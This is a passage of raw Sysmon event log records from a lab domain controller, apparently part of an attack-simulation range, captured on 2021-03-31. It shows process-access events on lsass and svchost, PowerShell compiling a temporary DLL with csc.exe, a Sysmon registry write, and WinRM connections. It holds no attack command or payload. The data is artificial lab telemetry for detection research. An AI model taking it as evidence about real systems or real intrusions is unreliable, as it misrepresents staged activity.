YSTEM32\ntdll.dll+51821 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.435{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.388{266CAFBE-6439-6064-C802-00000000AD01}5052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.341{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.966{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 11:59:59.919{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 354300x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.557{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53834-false10.0.1.14win-dc-892.attackrange.local5986- 354300x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.740{266CAFBE-62ED-6064-2900-00000000AD01}2752C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63323- 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.669{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.669{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.654{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.622{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.cmdlineMD5=C13AD99B06D1669FCD66EC17EF9F641A,SHA256=6CAE6F438C1E4BC3EB53F49EA38DB6ADDE793C21B52DBDAB5BB4BB310B1D128C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.622{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.0.csMD5=054C0A1487614BA970CB949FA443FFFB,SHA256=6B88C7F565FF6B5879B03F6F3622B596B63D0C76E3EC5751390A446AF187E21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.outMD5=78F50BA7CAC8DB585A187A73637847F0,SHA256=94360BE94D17DE1A33371EEB4A2B7D5A63E74FFE18C96A620F5DF0C1D4C2B0CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.pdbMD5=32530055B2EA7505C4488FC3394F7D4A,SHA256=15A88F31ACDFDA7B9C8990A5721416444DFBA143266FCB9E28FEB12FCDAA68C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dllMD5=CA9E4CAF01DB2BD34BA847580164CA35,SHA256=4D67BCA19C07B8B61D2478BCF6C21BDDDAC573036EDB004C9BC37FA1DFEB7A87,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\CSC256FC59F54DB41CB8ECA1DDFF829C17D.TMPMD5=B58A3CC64B3C0E396953EB63FF5DE8B2,SHA256=78D5543669E698F3642869ED00EC628726F08DAB117387BD5749C725ED1466ED,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dll2021-03-31 11:59:59.497 23542300x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESCC40.tmpMD5=7B96C35C7DF7CB01F4D95EF969279139,SHA256=12528E1FD1EC8332B7FF97D54A86C31581E021FA9524A9176CE2F6DCAAF00DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-643F-6064-D402-00000000AD01}4416ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESCC40.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 